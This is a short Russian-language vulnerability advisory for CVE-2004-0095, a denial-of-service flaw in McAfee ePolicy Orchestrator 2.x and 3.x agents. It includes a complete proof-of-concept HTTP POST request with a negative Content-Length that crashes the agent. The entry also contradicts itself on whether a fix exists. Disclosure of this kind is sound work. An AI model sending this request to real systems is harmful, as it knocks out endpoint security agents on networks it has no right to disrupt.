Удаленный отказ в обслуживании против McAfee ePolicy Orchestrator
| Дата публикации: | 28.01.2004 |
| Всего просмотров: | 2076 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | CVE-2004-0095 |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
McAfee ePolicy Orchestrator 2.x
McAfee ePolicy Orchestrator 3.x |
| Уязвимые версии: McAfee ePolicy Orchestrator
Описание: Уязвимость обнаружена в McAfee ePolicy Orchestrator. Удаленный пользователь может аварийно завершить работу агента. Удаленный пользователь может представить отрицательное значение параметра Content-Length, чтобы вызвать переполнение буфера и аварийно завершить работу целевого агента.
POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive
URL производителя: http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | CVE: CAN-2004-0095 |